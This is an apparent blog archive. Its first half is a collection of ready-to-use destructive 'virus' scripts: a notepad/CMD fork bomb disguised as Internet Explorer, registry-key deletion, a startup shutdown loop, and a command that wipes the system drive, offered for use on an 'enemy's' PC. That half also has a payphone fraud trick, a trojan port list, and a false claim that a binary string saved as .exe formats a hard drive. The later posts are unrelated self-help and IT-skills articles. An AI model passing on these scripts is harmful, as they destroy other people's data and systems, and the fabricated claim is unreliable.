Saturday, January 31, 2015

Popping CD Drives

*This will make the CD drives constantly pop out*

Code:-

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop


Endless Notepads


*This will pop up endless notepads until the computer freezes and crashes*

Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]


This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*

Code:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE

Make a photo background in drives

Perform the following steps ..>>

 Open notepad and copy the following code :

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=D:\Wallpapers\celeb\Genelia.jpg
iconarea_text=0x00FFFFFF

 Here, the path in the 2nd line of code represents the path of your picture. so just change at dere only....
 Now save this file as DESKTOP.INI in the location(any drive or any folder) where you desire to set the background picture.
 After setting it in your favourite location,close the drive and open the location again.
DONE !! .. your picture has been set as background picture for your desired location.
 
NOTE : Make sure that the extension in the path should be .jpg only and file should be saved as DESKTOP.INI only.

Coin Box Calling Hack

Steps:
1.Insert Coin
2.Dial 0##Phone No. *(star)
3.Call Unlimited
4.And Disconnect
5.Coin Comes Out
6.Go Home Smiling...~

Sunday, January 18, 2015

Trojan Ports.txt

TCP 1 Breach.2001, SocketsDeTroie.230, SocketsDeTroie.250
TCP 28 Amanda.200
TCP 31 MastersParadise.920
TCP 68 Subseven.100
TCP 142 NetTaxi.180
TCP 146 Infector.141, Intruder.100, Intruder.100
TCP 171 ATrojan.200
TCP 285 WCTrojan.100
TCP 286 WCTrojan.100
TCP 334 Backage.310
TCP 370 NeuroticKat.120, NeuroticKat.130
TCP 413 Coma.109
TCP 420 Breach.450
TCP 555 Id2001.100, PhaseZero.100, StealthSpy.100
TCP 623 Rtb666.160
TCP 660 Zaratustra.100
TCP 661 Noknok.800, Noknok.820
TCP 666 BackConstruction.210, BackConstruction.250, Bla.100, Bla.200, Bla.400, Bla.503, Cain.150, Dimbus.100, Noknok.820, Ripper.100, SatansBackdoor.100, SatansBackdoor.101, SatansBackdoor.102, Unicorn.100, Unicorn.101, Unicorn.110
TCP 667 SniperNet.210, Snipernet.220
TCP 668 Unicorn.101, Unicorn.110
TCP 680 Rtb666.160
TCP 777 Tiny.100, Undetected.230, Undetected.300, Undetected.310, Undetected.320, Undetected.330, Undetected.331, Undetected.332
TCP 785 NetworkTerrorist.100
TCP 800 NeuroticKitten.010
TCP 831 NeuroticKat.100, NeuroticKat.120, NeuroticKat.130
TCP 901 NetDevil.130, NetDevil.140
TCP 1000 DerSpaeher.200
TCP 1001 Silencer.100
TCP 1008 AutoSpy.100
TCP 1010 DerSpaeher.200
TCP 1015 Doly.150
TCP 1111 TPort.100
TCP 1130 Noknok.800, Noknok.820
TCP 1207 SoftWAR.100
TCP 1243 Subseven.100, SubSeven.110, SubSeven.180, SubSeven.190, Subseven.200
TCP 1245 VoodooDoll.006
TCP 1269 Matrix.130
TCP 1480 RemoteHack.130
TCP 1568 RemoteHack.100, RemoteHack.110
TCP 1600 DirectConnection.100
TCP 1601 DirectConnection.100
TCP 1602 DirectConnection.100
TCP 1634 NetCrack.100
TCP 1784 Snid.120, Snid.212
TCP 1999 TransmissionScout.100, TransmissionScout.110
TCP 2000 ATrojan.200, InsaneNetwork.400
TCP 2001 DIRT.220, TrojanCow.100
TCP 2003 TransmissionScout.100, TransmissionScout.110
TCP 2023 RipperPro.100
TCP 2040 InfernoUploader.100
TCP 2115 Bugs.100
TCP 2140 DeepThroat.100, DeepThroat.200, DeepThroat.310
TCP 2332 SilentSpy.202
TCP 2589 Dagger.140
TCP 2600 DigitalRootbeer.100
TCP 2989 Rat.200
TCP 3128 MastersParadise.970
TCP 3129 MastersParadise.920, MastersParadise.970
TCP 3150 DeepThroat.100, DeepThroat.200, DeepThroat.310, MiniBacklash.110
TCP 3215 BlackStar.100, Ghost.230
TCP 3333 Daodan.123
TCP 3410 OptixPro.100, OptixPro.110
TCP 3456 Force.155, TerrorTrojan.100
TCP 3505 AutoSpy.130, AutoSpy.140
TCP 3586 Snid.120, Snid.212
TCP 3700 PortalOfDoom.100
TCP 3723 Mantis.100
TCP 3800 Eclypse.100
TCP 3996 RemoteAnything.364
TCP 4000 SkyDance.220, SkyDance.229
TCP 4201 Wartrojan.160, Wartrojan.200
TCP 4225 SilentSpy.202
TCP 4321 Bobo.100
TCP 4444 AlexTrojan.200, Crackdown.100
TCP 4488 EventHorizon.100
TCP 4523 Celine.100
TCP 4545 InternalRevise.100, RemoteRevise.150
TCP 4567 FileNail.100
TCP 4666 Mneah.100
TCP 4950 ICQTrojan.100
TCP 5005 Aladino.060
TCP 5025 Keylogger.WMRemote.100
TCP 5031 NetMetro.104
TCP 5032 NetMetro.104
TCP 5033 NetMetro.104
TCP 5050 RoxRat.100
TCP 5151 OptixLite.020, OptixLite.030, OptixLite.040
TCP 5190 MBomber.100
TCP 5277 WinShell.400
TCP 5343 WCRat.100
TCP 5400 BackConstruction.120, BackConstruction.150, BladeRunner.080, DeepThroat.300
TCP 5401 BackConstruction.120, BackConstruction.150, BackConstruction.210, BackConstruction.250, BladeRunner.080, DeepThroat.300, Mneah.100
TCP 5402 BackConstruction.210, BackConstruction.250, BladeRunner.080, DeepThroat.300, Mneah.100
TCP 5534 TheFlu.100
TCP 5550 XTCP.200, XTCP.201
TCP 5555 Noxcape.100, Noxcape.200
TCP 5695 Assassin.100
TCP 5714 WinCrash.100
TCP 5741 WinCrash.100
TCP 5742 WinCrash.103
TCP 5802 Y3KRat.160
TCP 5810 Y3KRat.160
TCP 5838 Y3KRat.170
TCP 5858 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5880 Y3KRat.140
TCP 5881 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5882 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5883 Y3KRat.110, Y3KRat.140
TCP 5884 Y3KRat.140, Y3KRat.150
TCP 5885 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5886 Y3KRat.120, Y3KRat.140
TCP 5887 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5888 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5889 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5890 Y3KRat.140
TCP 6400 Thething.100, Thething.150
TCP 6556 AutoSpy.120, AutoSpy.122
TCP 6655 Aqua.020
TCP 6660 LameSpy.095
TCP 6666 LameRemote.100, ProjectMayhem.100
TCP 6669 Vampire.100
TCP 6670 DeepThroat.200, DeepThroat.210
TCP 6671 DeepThroat.310
TCP 6699 HostControl.101
TCP 6711 DeepThroat.300, Noknok.820, SubSeven.180, SubSeven.190
TCP 6712 Subseven.100
TCP 6713 Subseven.100
TCP 6767 NTRC.120
TCP 6776 SubSeven.180, SubSeven.190, Subseven.200
TCP 6789 Doly.200
TCP 6796 SubSeven.214
TCP 6912 ShitHeep.100
TCP 6939 Indoctrination.100
TCP 6953 Lithium.100
TCP 6969 2000Cracks.100, Bigorna.100, Danton.110, Danton.210, Danton.220, Danton.310, Danton.320, Danton.330, GateCrasher.110, NetController.108, Sparta.110, VagrNocker.120
TCP 6970 Danton.330
TCP 7001 Freak88.100
TCP 7119 Massaker.100
TCP 7200 Massaker.110
TCP 7300 Coced.221
TCP 7301 Coced.221
TCP 7306 NetSpy.200, NetSpy.200
TCP 7410 Phoenix.190, Phoenix.200
TCP 7511 Genue.100
TCP 7609 Snid.120, Snid.212
TCP 7614 Wollf.130
TCP 7648 BlackStar.100, Ghost.230
TCP 7788 Last.2000, Matrix.200
TCP 7826 MiniOblivion.010, Oblivion.010
TCP 7887 SmallFun.110
TCP 7891 Revenger.100
TCP 7979 VagrNocker.200
TCP 7997 VagrNocker.200
TCP 8000 XConsole.100
TCP 8011 Way.240
TCP 8012 Ptakks.215, Ptakks.217
TCP 8110 LoseLove.100
TCP 8111 LoseLove.100
TCP 8301 LoseLove.100
TCP 8302 LoseLove.100
TCP 8372 NetBoy.100
TCP 8720 Connection.130
TCP 8734 AutoSpy.110
TCP 8811 Force.155
TCP 8899 Last.2000
TCP 9000 Aristotles.100
TCP 9301 LoseLove.100
TCP 9400 InCommand.100, InCommand.110, InCommand.120, InCommand.130, InCommand.140, InCommand.150, InCommand.153, InCommand.160, InCommand.167, InCommand.170
TCP 9401 InCommand.100, InCommand.110, InCommand.170
TCP 9402 InCommand.100, InCommand.110
TCP 9561 CRatPro.110
TCP 9563 CRatPro.110
TCP 9580 TheefLE.100
TCP 9696 Danton.210, Ghost.230
TCP 9697 Danton.320, Danton.330, Ghost.230
TCP 9870 R3C.100
TCP 9872 PortalOfDoom.100
TCP 9873 PortalOfDoom.100
TCP 9874 PortalOfDoom.100
TCP 9875 PortalOfDoom.100
TCP 9876 Rux.100, SheepGoat.100
TCP 9877 SmallBigBrother.020
TCP 9878 SmallBigBrother.020, TransmissionScout.100, TransmissionScout.110, TransmissionScout.120
TCP 9879 SmallBigBrother.020
TCP 9999 ForcedEntry.100, Infra.100, Prayer.120, Prayer.130, TakeOver.200, TakeOver.300
TCP 10001 DTr.130, DTr.140
TCP 10013 Amanda.200
TCP 10067 PortalOfDoom.100
TCP 10100 Gift.240
TCP 10101 NewSilencer.100
TCP 10167 PortalOfDoom.100
TCP 10528 HostControl.100, HostControl.260
TCP 10607 Coma.109
TCP 10666 Ambush.100
TCP 11011 Amanda.200
TCP 11050 HostControl.101
TCP 11051 HostControl.100, HostControl.260
TCP 11223 AntiNuke.100, Progenic.100, Progenic.110
TCP 11225 Cyn.100, Cyn.103, Cyn.120
TCP 11306 Noknok.800, Noknok.820
TCP 11831 Katux.200, Latinus.140, Latinus.150, Pest.100, Pest.400
TCP 11991 PitfallSurprise.100
TCP 12043 Frenzy.2000
TCP 12345 Fade.100, Netbus.160, Netbus.170, VagrNocker.400
TCP 12346 Netbus.160, Netbus.170
TCP 12348 Bionet.210, Bionet.261, Bionet.280, Bionet.302, Bionet.305, Bionet.311, Bionet.313, Bionet.316, Bionet.317
TCP 12349 Bionet.084, Bionet.261, Bionet.280, Bionet.302, Bionet.305, Bionet.311, Bionet.313, Bionet.314, Bionet.316, Bionet.317, Bionet.401, Bionet.402
TCP 12389 KheSanh.210
TCP 12478 Bionet.210
TCP 12623 Buttman.090, Buttman.100
TCP 12624 Buttman.090, Buttman.100
TCP 12625 Buttman.100
TCP 12904 Akropolis.100, Rocks.100
TCP 13473 Chupacabra.100
TCP 13753 AFTP.010
TCP 14100 Eurosol.100
TCP 14194 CyberSpy.840
TCP 14286 HellDriver.100
TCP 14500 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14501 PCInvader.060, PCInvader.070
TCP 14502 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14503 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14504 PCInvader.050, PCInvader.060
TCP 15092 HostControl.100, HostControl.260
TCP 15382 SubZero.100
TCP 15432 Cyn.210
TCP 15555 ICMIBC.100
TCP 16322 LastDoor.100
TCP 16484 MoSucker.110
TCP 16661 Dfch.010
TCP 16969 Progenic.100
TCP 16982 AcidShiver.100
TCP 17300 Kuang.200
TCP 17499 CrazzyNet.370, CrazzyNet.375, CrazzyNet.521
TCP 17500 CrazzyNet.370, CrazzyNet.375, CrazzyNet.521
TCP 17569 Infector.141, Infector.160, Infector.170, Infector.180, Infector.190, Infector.200, Intruder.100, Intruder.100
TCP 17593 AudioDoor.120
TCP 19191 BlueFire.035, BlueFire.041
TCP 19604 Metal.270
TCP 19605 Metal.270
TCP 19991 Dfch.010
TCP 20000 Millenium.100
TCP 20001 Millenium.100, PshychoFiles.180
TCP 20002 AcidKor.100, PshychoFiles.180
TCP 20005 MoSucker.200, MoSucker.210, MoSucker.220
TCP 21212 Schwindler.182
TCP 21554 Exploiter.100, Exploiter.110, Girlfriend.130, GirlFriend.135
TCP 21579 Breach.2001
TCP 21584 Breach.2001
TCP 21684 Intruse.134
TCP 22068 AcidShiver.110
TCP 22115 Cyn.120
TCP 22222 Prosiak.047, Ruler.141, Rux.300, Rux.400, Rux.500, Rux.600
TCP 22223 Rux.400, Rux.500, Rux.600
TCP 22456 Bla.200, Bla.503
TCP 22457 AcidShiver.120, Bla.200, Bla.503
TCP 22784 Intruzzo.110
TCP 22845 Breach.450
TCP 22847 Breach.450
TCP 23005 Infinaeon.110, NetTrash.100, Oxon.110, WinRat.100
TCP 23006 Infinaeon.110, NetTrash.100, Oxon.110, WinRat.100
TCP 23032 Amanda.200
TCP 23432 Asylum.010, Asylum.012, Asylum.013, Asylum.014, MiniAsylum.110
TCP 23456 EvilFTP.100, VagrNocker.400
TCP 23476 DonaldDick.153, DonaldDick.154, DonaldDick.155
TCP 23477 DonaldDick.153
TCP 24000 Infector.170
TCP 24307 Wildek.020
TCP 25386 MoonPie.220
TCP 25486 MoonPie.220
TCP 25555 FreddyK.100, FreddyK.200
TCP 25556 FreddyK.100
TCP 25685 MoonPie.010, MoonPie.012, MoonPie.130, MoonPie.220, MoonPie.240, MoonPie.400
TCP 25686 MoonPie.135, MoonPie.200, MoonPie.400
TCP 25982 MoonPie.135, MoonPie.200
TCP 26274 Delta.050
TCP 27160 MoonPie.135, MoonPie.200
TCP 27184 Alvgus.100, Alvgus.800
TCP 27374 Muerte.110, Subseven.210, SubSeven.213
TCP 28429 Hack'a'Tack.2000
TCP 28430 Hack'a'Tack.2000
TCP 28431 Hack'a'Tack.2000
TCP 28432 Hack'a'Tack.2000
TCP 28433 Hack'a'Tack.2000
TCP 28434 Hack'a'Tack.2000
TCP 28435 Hack'a'Tack.2000
TCP 28436 Hack'a'Tack.2000
TCP 29559 DuckToy.100, DuckToy.101, Katux.200, Latinus.140, Latinus.150, Pest.100, Pest.400
TCP 29891 Unexplained.100
TCP 30000 Infector.170
TCP 30001 Error32.100
TCP 30003 LamersDeath.100
TCP 30029 AOLTrojan.110
TCP 30100 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30101 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30102 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30103 NetSphere.131
TCP 30947 Intruse.134
TCP 31320 LittleWitch.400, LittleWitch.420
TCP 31337 BackOrifice.120, Khaled.100, OPC.200
TCP 31415 Lithium.101
TCP 31416 Lithium.100, Lithium.101
TCP 31557 Xanadu.110
TCP 31631 CleptoManicos.100
TCP 31745 Buschtrommel.100, Buschtrommel.122
TCP 31785 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31787 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31789 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31791 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31887 BDDT.100
TCP 31889 BDDT.100
TCP 32100 ProjectNext.053
TCP 32418 AcidBattery.100
TCP 32791 Akropolis.100, Rocks.100
TCP 33291 RemoteHak.001
TCP 33333 Blackharaz.100, Prosiak.047, SubSeven.214
TCP 33577 SonOfPsychward.020
TCP 34324 TelnetServer.100
TCP 34763 Infector.180, Infector.190, Infector.200
TCP 35000 Infector.190, Infector.200
TCP 35600 Subsari.140
TCP 36794 BugBear.100
TCP 37237 Mantis.020
TCP 37651 YAT.210
TCP 37653 YAT.310
TCP 40308 Subsari.140
TCP 40412 TheSpy.100
TCP 40421 MastersParadise.970
TCP 40422 MastersParadise.970
TCP 40999 DiemsMutter.110, DiemsMutter.140
TCP 41626 Shah.100
TCP 44444 Prosiak.070
TCP 45673 Akropolis.100, Rocks.100
TCP 47262 Delta.050
TCP 48006 Fragglerock.200
TCP 49683 HolzPferd.210
TCP 50000 Infector.180
TCP 50130 Enterprise.100
TCP 50766 Fore.100
TCP 51234 Cyn.210
TCP 51966 Cafeini.080, Cafeini.110
TCP 54321 PCInvader.010
TCP 57341 NetRaider.100
TCP 57922 Bionet.084
TCP 58008 Tron.100
TCP 58009 Tron.100
TCP 59090 AcidReign.200
TCP 59211 DuckToy.100, DuckToy.101
TCP 59345 NewFuture.100
TCP 60000 DeepThroat.300, MiniBacklash.100, MiniBacklash.101, MiniBacklash.101
TCP 60411 Connection.100, Connection.130
TCP 60412 Connection.130
TCP 60552 RoxRat.100
TCP 63536 InsaneNetwork.500
TCP 63878 AphexFTP.100
TCP 63879 AphexFTP.100
TCP 64969 Lithium.100
TCP 65000 Socket.100
UDP 1 SocketsDeTroie.250
UDP 666 Bla.200, Bla.400, Bla.503, Noknok.820
UDP 1130 Noknok.800, Noknok.820
UDP 2140 DeepThroat.100, DeepThroat.200, DeepThroat.310
UDP 2989 Rat.200
UDP 3128 MastersParadise.970
UDP 3129 MastersParadise.920, MastersParadise.970
UDP 3150 DeepThroat.100, DeepThroat.200, DeepThroat.310, MiniBacklash.110
UDP 3333 Daodan.123
UDP 3800 Eclypse.100
UDP 3996 RemoteAnything.364
UDP 4000 RemoteAnything.364
UDP 5555 Daodan.123
UDP 5881 Y3KRat.110, Y3KRat.140
UDP 5882 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
UDP 5883 Y3KRat.110, Y3KRat.140
UDP 5884 Y3KRat.140, Y3KRat.150
UDP 5885 Y3KRat.110, Y3KRat.120, Y3KRat.140
UDP 5886 Y3KRat.120, Y3KRat.140
UDP 5887 Y3KRat.110, Y3KRat.120, Y3KRat.140
UDP 5888 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.150
UDP 6953 Lithium.100
UDP 8012 Ptakks.217
UDP 10067 PortalOfDoom.100
UDP 10167 PortalOfDoom.100
UDP 10666 Ambush.100
UDP 11225 Cyn.100, Cyn.103, Cyn.120
UDP 11306 Noknok.800, Noknok.820
UDP 12389 KheSanh.210
UDP 12623 Buttman.090, Buttman.100
UDP 12625 Buttman.100
UDP 14100 Eurosol.100
UDP 23476 DonaldDick.155
UDP 26274 Delta.050
UDP 27184 Alvgus.100
UDP 28431 Hack'a'Tack.2000
UDP 28432 Hack'a'Tack.2000
UDP 28433 Hack'a'Tack.2000
UDP 28434 Hack'a'Tack.2000
UDP 28435 Hack'a'Tack.2000
UDP 28436 Hack'a'Tack.2000
UDP 29891 Unexplained.100
UDP 30103 NetSphere.131
UDP 31320 LittleWitch.400, LittleWitch.420
UDP 31337 BackOrifice.120, OPC.200
UDP 31416 Lithium.100, Lithium.101
UDP 31789 Hack'a'Tack.100, Hack'a'Tack.112
UDP 31791 Hack'a'Tack.100, Hack'a'Tack.112
UDP 33333 Blackharaz.100
UDP 47262 Delta.050
UDP 49683 HolzPferd.210
UDP 60000 MiniBacklash.100

How To See Hidden Files, Using Dos.txt

at command prompt just type
dir /ah
if the list is too long u can use
dir /ah/p/w 

FACEBOOK ACCEPT OR REJECT AT ONE TIME

 FACEBOOK ACCEPT OR REJECT AT ONE TIME

        If You Get A Lot Of Friend Requests Daily Or You Opened You Facebook Account After A Long Time, You Could End Up Having To Manually Accept Or Reject All Of Them, these code can be used to accept or reject all of them at once.

 PROCESS>>>

 Copy The Following Code:

For Accepting:

javascript:for( i = 1;i<document.getElementsByName("actions[accept]").length;i++){document.getElementsByName("actions[accept]")[i].click();}void(0);

For Rejecting:

javascript:for( i = 1;i<document.getElementsByName("actions[hide]").length;i++){document.getElementsByName("actions[hide]")[i].click();}void(0);

    Paste This Code In The Address Bar Of The Page You Opened In The First Step

    Now Just Wait And Let The Script Work!!


Note: For Chrome Users: When You Paste The Code In The Address Bar, You Will Manually Need To Reinsert "javascript:" in Front Of It

Make your Computer Welcome You

Do you watch movies? Have you always loved the way how Computers in movies welcome their users by calling out their names? I bet that you too would want to know how you can achieve similar results on your PC and have a computer said welcome. 

Then you are at the right place, this article describes exactly how you can make your computer welcome you like this.

With this trick, you can make your Computer welcome you in its computerized voice. You can make your Windows based computer say "Welcome to your PC, Username."

Make Windows Greet you with a Custom Voice Message at Startup

To use this trick, follow the instructions given below:-

  1. Click on Start. Navigate to All Programs, Accessories and Notepad.
  2. Copy and paste the exact code given below.
Dim speaks, speech
speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks
     3.  Replace Username with your own name
     4.  Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs or "*.vbs".
     5.  Copy the saved file. 
     6.  Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) and toC:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista) if C: is your System drive. AppData is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it.
     7.  Paste the file.



 Make your Computer Welcome you at startup

Now when the next time you start your computer, Windows will welcome you in its own computerized voice. 

Note: For best results, it is recommended to change sound scheme to No Sounds.
You can change the sound scheme to No Sounds by following the steps given below:-
  1. Go to Control Panel.
  2. Then click on Switch to Classic View.
  3. Then Click on Sounds and Audio Devices.
  4. Then Click on the Sounds Tab.
  5. Select No Sounds from the Sound Scheme option.
  6. If you wish to save your Previous Sound Scheme, you can save it by clicking Yes in the popup menu.
  7. Click on OK.
Change Sound Scheme to No Sounds

code for crashing the coomputer

Step 1: NotePad

First you need to open Notepad.
You can go to the start menu and Click "All Programs", Then find the Folder "Accessories"
and "Notepad" should be in that folder.
Or you can open the start menu and type "Notepad" and click enter and Notepad will open.

Go To Next Step---------------------------------------->>>>>

Step 2: The Typing Part

Type in Notepad-
@echo off
:a
Start
Start
Start
Start
Start
Start
goto :a


What this will do is Open CMD six times and then repeat itself. Over and Over. You cant stop it. SO DONT TRY IT ON YOUR COMPUTER!!!

Step 3: Saving

When you save, Go to "File", "Save As", and save it as "Internet Explorer.bat". Where it says "FileType" Select "All Files" or it wont work!!!
Make Sure you save it to the desktop!!!!!!!!!

Step 4: Changing the Icon

Next you need to change the icon to look like "Internet Explorer".
To do this you need to right click the Icon and go down to "Create Shortcut" and then rename it to "Internet Explorer". Then right click it and go down to "Properties" and select "Change Icon".
Find the Internet Explorer Icon and click it and then click "Apply".

Put the original Batch File in a random folder on the desktop. So they cant see it.

G mail dot(.) trick fool any site

Its very useful trick, with that trick u Able create many account in One
Site,
read that!
if u Have only one G mail Id,
and u want to Reg. on any Site second time, and
They not Allowed One email two Times, then u
Use that Trick,
trick is that!
u add one or more dots(.) in old email id,
Suppose your old id is- hackermail@gmail.com On next time u Use!
hacker.mail@gmail.com,hacker..mail@gmail.com,or just insert many dot(.)in your G mail id
with that Ur registration Success! and,
if u think!
"Which id we get Conformation mail" don't Worry u Get confirmation mail on Ur Real
id

virus for restarting ur computer

Lets see how it works. Just close all windows . Now go to command prompt(Start >>>"RUN" now type "cmd"). Now you have entered MS-DOS/ Command prompt. Here You need to type "shutdown -s" or "restart -s". This will shutdown or restart your comp. We are making use of this DOS command to create this virus.

    * Just open a notepad

    * In that type "shutdown -s" or "restart -s".

    * Now save it as virus.bat.

    * Now when you run it your system gets turned off.

Note if .bat extension doesn't work try .exe extension

To make this more powerful just force your victim to copy this into "START>>>ALL PROGRAM>>> STARTUP". Now this program will load every time the computer starts and the computer will keep on restarting.

code for formatting and destroying hard disk drive

1) Open Notepad.
2) Copy and Paste the given Code into Notepad :


01001011000111110010010101010101010000011111100000

3) Save it as HardDriveVirus.exe.
4) Now it is done.
5) Don't Run this Fle on your Own Computer. If you run this file the Hard Drive would be Formated.

virus for crashes windows within few seconds using notepad

This is a very simple virus program to delete all the contents of the C drive and completely deletes the windows operating system.

Open Notepad and Enter the following code

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save the above code with  .bat extension.

Caution: If you open the .bat file it will delete ur systemdrive. so be careful If Any lose of ur data i am not responsible for that. You should carefully use it. Use it only on your enemy's laptop or PC.

Saturday, January 17, 2015

successful people vs unsuccessful people


8 things success people can have

Who doesn’t want success in life? But only a few can manage to be successful. What is the secret of being successful in life? Well, go through the following eight things that really successful people do.



01. Making materialism irrelevant

Many of us focus only on the material needs. They concentrate mainly of the benefits of success like suing fancy cars, having magnificent houses. It’s true that people like to lead luxurious life. That’s not a problem. But if you dream for the luxury instead of making proper plans to be successful, you are not in the right track. At first, set your goals and work properly. Definitely you will enjoy the benefits of success at the right time.

02. Enhancing your knowledge

To be successful in life requires vast knowledge. So, if you want to be successful, gather as much knowledge as you can. Work hard, communicate with the right people and enhance your knowledge. The more knowledge you have, the more likely you are to grab all the opportunities before you.

03. Managing relationships

All are attracted to successful people. So, successful persons have to deal with a variety of people. Successful persons know how much time to spend with each of them. They have to determine how much important it is and how much time to spend with each individual.

04. Using emotions

We are emotional. So, emotional appeal can be a great way to get what you want. Successful persons know how to deal with the emotions. They don’t let their emotions to ruin everything. They know how to use emotions to achieve what they want.

05. Committing to a physical ideal

Who doesn’t want a nice and healthy looking physical appearance? To see your body in appropriate shape that you want requires some working. It’s not necessary that you should maintain your physical health like a fashion model or athlete. Determine a shape of your body which will be helpful for you and work to achieve that.

06. Being clear about spiritual belief

To be successful and to retain that, you should have clarity about your spiritual belief. This is important for inner peace. Some people don’t believe in God. They maintain some clear logic for that and evaluate the spirituality from their personal point of view. Be clear about your spiritual beliefs.

07. Maintaining ethics

Every individual has own point of view on how the world is going on or how the people around should be treated. This varies from individual to individual. Whatever your point of view is, be clear about that and let people know clearly.

08. Focusing on time efficiency

To be successful in life, you should be able to determine the importance of any activity you are going to perform. Depending on the importance of a specific matter, spend your time accordingly. Don’t waste your time to do something which isn’t really important. Save your time as much as you can.

Thursday, January 15, 2015

10 tricks to become a loving, positive person

It's one thing to wax eloquent on positivity, but quite another to be a positive person at heart.

Despite believing to have a positive outlook, we invariably weigh the cons first, consider several times before sparing a compliment, and broadcast only the odds when someone counts on us for advice. What's more, we prefer needless sarcasm for humour, manage a wry smile when something is genuinely funny, and believe deep down that the glass is actually half empty.

We live in denial of our inherent negativity for the most part, and often wonder why the world around is so mean and reckless. At work, we never fail telling our juniors how meeting deadlines can be a tough proposition, and not to think too 'out of the box' to impress the boss. In short, we never tire telling all concerned how tough things can be! Unlike dogs we may not be born eternal optimists, but positivity is something that can be imbibed even if a tad forcibly; such as by trying to tweak our sense of humour, the way we react to a given situation, by being more pleasant and believing others too have a mind, and by smiling each time somebody says 'thank you'.

While positivity is a state of mind, the answer lies in our perspective. Clinical psychologist and lifestyle advisor Dr S.K Sharma shares his ideas on how to be a positive person everyday.

Have the desire: First thing first, to become a positive person one must have a strong desire to be positive. And the desire will come only if you are convinced that becoming a positive person will enhance the quality of life. Positivity is like an aura, and you know you are a positive person when people start trusting you, random people become polite with you, colleagues at work start patronising you, and you start building rapport easily.

Be realistic: Do not try to become a saint. Becoming a positive person does not mean you can never have any negative emotion or encounter any negative situation. It is the overall attitude that matters. Don't get bogged down by failure, and disappointed when your expectations are not met. Mentally, you should always be calculating a way out of difficult situations come what may.

Experiment: Be a keen observer. Use everyday life incidents to see how you can manage them in a more positive manner. These will serve as perfect instances to turn your outlook more positive. For starters, contemplate how you could have better handled a situation by being less hostile and more indulgent. Come up with five ways that could have saved the day, and learn to take things at face value sometimes. Remember, your ability to trust the other person also reflects your genuineness.

Speech and body language: Try and make positive words a part of your daily lingo, and work on your body language in way that you come across as friendly and approachable. Look amused when something is amusing, laugh when something is funny, congratulate when someone's bought something new, and give others a chance to narrate their side of the story. Never think you are the only interesting, knowing one around.

Company: One way to becoming positive is to seek positive company as both positivity and negativity are infectious. If the people you spend most of your time with are grumpy or have a pessimistic standpoint, you'll find yourself mirroring the same emotions before a different set of people inadvertently. In order to inculcate positivity it is imperative that your friend circle is a positive, energetic, and a happy bunch. You'll find yourself carrying the same positivity everywhere you go.

Activities: Do not remain idle and brood. Take up positive activities with others or in isolation. Share a joke, narrate a pleasant incident, take part in sporting activities, go for a run in the evening after work, have healthy sex, and you'll find yourself bubbling with positive energy.

Take it easy: Everyday life is bound to give you shocks. Be prepared to minimise impact and shrug it off. For instance, you may get too hassled everyday while driving to work or trying to park your car. When you accept the fact that certain things cannot be changed, you'll be more at ease with yourself and those around too.

Learn yoga: Says yoga teacher and nutritionist, Abhilasha Kale, "Do pranayam everyday as it lets you focus and meditate. Not only does it secrete happy hormones but also creates a sense of awareness within you." With the help of yogic asanas you control your breathing, and by way of it, control your mind from wandering. Every time you do yoga, you feel a surge of positive energythrough your body that calms your nerves, soothes your mind, elevates your mood, and not to mention enhances your level of tolerance.

Maintain a diary: Instead of recounting all events of the day, filter out only the positive ones and make a note of them. It could be anything trivial from your bus arriving on time, your mom cooking a delicious breakfast, to remembering to pay the bills on time. When we look for positivity in the little things that make our lives worthwhile, we leave no room for negativity. "Try consciously practising this for 10 days, and at the end of day ten when you read your diary back you'll only have memories of all the good things that happened to you," she asserts.

Say 'thank you': Thank god, thank your parents, friends, and thank yourself for all the hard work you did, for everything you achieved. Says Abhilasha, "Saying thank you frequently makes you humble, and a humble person is seldom cynical."

10 Skills IT Pros Need for Cloud Computing

IT professionals have to work constantly to ensure that their skills are up to date. Today, IT pros must guarantee that their cloud-focused skills are resume-ready. And just what are those skills? According to a Forbes.com blog post by contributor Joe McKendrick, there are eight key skills. To those, I add two more.
1. Business and financial skills
The intersection of business and technology is always an overarching concern, but it is especially so when it comes to cloud-based computing.
2. Technical skills
